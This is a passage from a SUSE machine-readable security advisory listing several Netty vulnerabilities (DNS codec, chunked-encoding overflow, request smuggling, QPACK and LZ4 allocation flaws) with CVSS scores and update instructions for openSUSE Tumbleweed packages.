"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-05-16T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2026-42578"
},
{
"cve": "CVE-2026-42579",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-42579"
}
],
"notes": [
{
"category": "general",
"text": "Netty is an asynchronous, event-driven network application framework. Prior to 4.2.13.Final and 4.1.133.Final, Netty\u0027s DNS codec does not enforce RFC 1035 domain name constraints during either encoding or decoding. This creates a bidirectional attack surface: malicious DNS responses can exploit the decoder, and user-influenced hostnames can exploit the encoder. This vulnerability is fixed in 4.2.13.Final and 4.1.133.Final.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-42579",
"url": "https://www.suse.com/security/cve/CVE-2026-42579"
},
{
"category": "external",
"summary": "SUSE Bug 1265272 for CVE-2026-42579",
"url": "https://bugzilla.suse.com/1265272"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 8.2,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:L",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-05-16T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2026-42579"
},
{
"cve": "CVE-2026-42580",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-42580"
}
],
"notes": [
{
"category": "general",
"text": "Netty is an asynchronous, event-driven network application framework. Prior to 4.2.13.Final and 4.1.133.Final, Netty\u0027s chunk size parser silently overflows int, enabling request smuggling attacks. This vulnerability is fixed in 4.2.13.Final and 4.1.133.Final.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-42580",
"url": "https://www.suse.com/security/cve/CVE-2026-42580"
},
{
"category": "external",
"summary": "SUSE Bug 1265273 for CVE-2026-42580",
"url": "https://bugzilla.suse.com/1265273"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.3,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-05-16T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2026-42580"
},
{
"cve": "CVE-2026-42581",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-42581"
}
],
"notes": [
{
"category": "general",
"text": "Netty is an asynchronous, event-driven network application framework. Prior to 4.2.13.Final and 4.1.133.Final, HttpObjectDecoder strips a conflicting Content-Length header when a request carries both Transfer-Encoding: chunked and Content-Length, but only for HTTP/1.1 messages. The guard is absent for HTTP/1.0. An attacker that sends an HTTP/1.0 request with both headers causes Netty to decode the body as chunked while leaving Content-Length intact in the forwarded HttpMessage. Any downstream proxy or handler that trusts Content-Length over Transfer-Encoding will disagree on message boundaries, enabling request smuggling. This vulnerability is fixed in 4.2.13.Final and 4.1.133.Final.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-42581",
"url": "https://www.suse.com/security/cve/CVE-2026-42581"
},
{
"category": "external",
"summary": "SUSE Bug 1265277 for CVE-2026-42581",
"url": "https://bugzilla.suse.com/1265277"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.3,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-05-16T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2026-42581"
},
{
"cve": "CVE-2026-42582",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-42582"
}
],
"notes": [
{
"category": "general",
"text": "Netty is an asynchronous, event-driven network application framework. Prior to 4.2.13.Final, when decoding header blocks, the non-Huffman branch of io.netty.handler.codec.http3.QpackDecoder#decodeHuffmanEncodedLiteral may execute new byte[length] for a string literal before verifying that length bytes are actually present in the compressed field section. The wire encoding allows a very large length to be expressed in few bytes. There is no check that length \u003c= in.readableBytes() before new byte[length]. This vulnerability is fixed in 4.2.13.Final.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-42582",
"url": "https://www.suse.com/security/cve/CVE-2026-42582"
},
{
"category": "external",
"summary": "SUSE Bug 1265318 for CVE-2026-42582",
"url": "https://bugzilla.suse.com/1265318"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-05-16T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2026-42582"
},
{
"cve": "CVE-2026-42583",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-42583"
}
],
"notes": [
{
"category": "general",
"text": "Netty is an asynchronous, event-driven network application framework. Prior to 4.2.13.Final and 4.1.133.Final, Lz4FrameDecoder allocates a ByteBuf of size decompressedLength (up to 32 MB per block) before LZ4 runs. A peer only needs a 21-byte header plus compressedLength payload bytes - 22 bytes if compressedLength == 1 - to force that allocation. This vulnerability is fixed in 4.2.13.Final and 4.1.133.Final.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-42583",
"url": "https://www.suse.com/security/cve/CVE-2026-42583"
},
{
"category": "external",
"summary": "SUSE Bug 1265279 for CVE-2026-42583",
"url": "https://bugzilla.suse.com/1265279"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-05-16T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2026-42583"
},
{
"cve": "CVE-2026-42584",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-42584"
}
],
"notes": [
{
"category": "general",
"text": "Netty is an asynchronous, event-driven network application framework. Prior to 4.2.13.Final and 4.1.133.Final, HttpClientCodec pairs each inbound response with an outbound request by queue.poll() once per response, including for 1xx. If the client pipelines GET then HEAD and the server sends 103, then 200 with GET body, then 200 for HEAD, the queue pairs HEAD with the first 200. The HEAD rule then skips reading that message\u0027s body, so the GET entity bytes stay on the stream and the following 200 is parsed from the wrong offset. This vulnerability is fixed in 4.2.13.Final and 4.1.133.Final.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-42584",
"url": "https://www.suse.com/security/cve/CVE-2026-42584"
},
{
"category": "external",
"summary": "SUSE Bug 1265280 for CVE-2026-42584",
"url": "https://bugzilla.suse.com/1265280"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
